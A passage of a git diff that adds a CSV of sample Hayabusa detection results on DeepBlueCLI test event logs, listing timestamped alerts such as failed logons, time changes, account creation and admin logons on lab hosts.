diff --git a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv new file mode 100644 index 00000000..0ae6f001 --- /dev/null +++ b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv @@ -0,0 +1,10073 @@ +Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath +2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d5b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x57d8d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a20 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x39a67 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 